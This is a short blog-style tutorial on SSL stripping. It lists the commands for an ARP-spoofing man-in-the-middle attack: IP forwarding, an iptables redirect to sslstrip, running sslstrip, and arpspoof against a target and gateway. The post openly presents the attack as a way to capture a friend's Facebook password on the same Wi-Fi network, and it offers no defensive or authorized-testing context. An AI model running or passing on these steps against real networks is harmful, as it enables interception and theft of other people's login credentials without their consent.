SSL Strip on gmail
What is SSL Strip?
SSL strip is a software that is used to sniff the data over HTTP and HTTPS. The sniffer read all the data in a network with is send between a user and the Router but no a days SSH or "HTTPS" have made it very difficult to get useful data (Like Facebook Password of your friend in same wifi network). So here is a tools that can even intercept the data over HTTP and HTTPS.
Running sslstrip
- Flip your machine into forwarding mode. (echo "1" > /proc/sys/net/ipv4/ip_forward)
- Setup iptables to redirect HTTP traffic to sslstrip. (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>)
- Run sslstrip. (sslstrip.py -l <listenPort>)
- Run arpspoof to convince a network they should send their traffic to you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>)
Comments
Post a Comment